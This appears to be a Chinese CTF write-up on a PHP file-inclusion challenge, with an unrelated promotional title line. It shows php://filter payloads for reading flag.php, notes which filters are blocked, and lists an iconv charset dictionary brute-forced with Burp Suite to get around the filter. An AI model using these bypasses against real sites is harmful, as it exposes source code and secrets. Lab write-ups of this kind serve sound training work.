網(wǎng)站制作聯(lián)盟廈門百度推廣怎么做
進(jìn)入靶場
?
直接顯示源代碼
提示我們通過get方式傳遞名為filename的參數(shù),同時(shí)給出了文件名check.php?
filename=check.php?
顯示使用了正確的用法,錯(cuò)誤的方法
?filename=./check.php
還是一樣的回顯
傻了,題目名稱是文件包含,需要用到函數(shù)
文件包含漏洞-CSDN博客
先試試最常用到的這個(gè)?
php://filter/read=convert.base64-encode/resource=flag.php
?
被過濾了
換一個(gè)偽協(xié)議
data://text/plain,123456
話是這么說,但沒顯示123456說明data協(xié)議不行
間接提示了php偽協(xié)議換個(gè)過濾器說不定可以
?php://filter/read=convert.base64-encode/resource=flag.php
之前用的是上面這個(gè),一個(gè)個(gè)嘗試看看被過濾的是哪些
?
?read和base編碼被禁了
不使用read的話還有string開頭的過濾器
string也被過濾了
試試下面這個(gè)
php://filter/convert.iconv.utf-8/gbk/resource=flag.php
作用是將文本從 UTF - 8 編碼轉(zhuǎn)換為 GBK 編碼?
?
這個(gè)編碼轉(zhuǎn)換不行,但有很多編碼供我們嘗試
使用bp去爆破
字典如下
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*?
?
發(fā)現(xiàn)有兩種組合都能得到flag?
?
?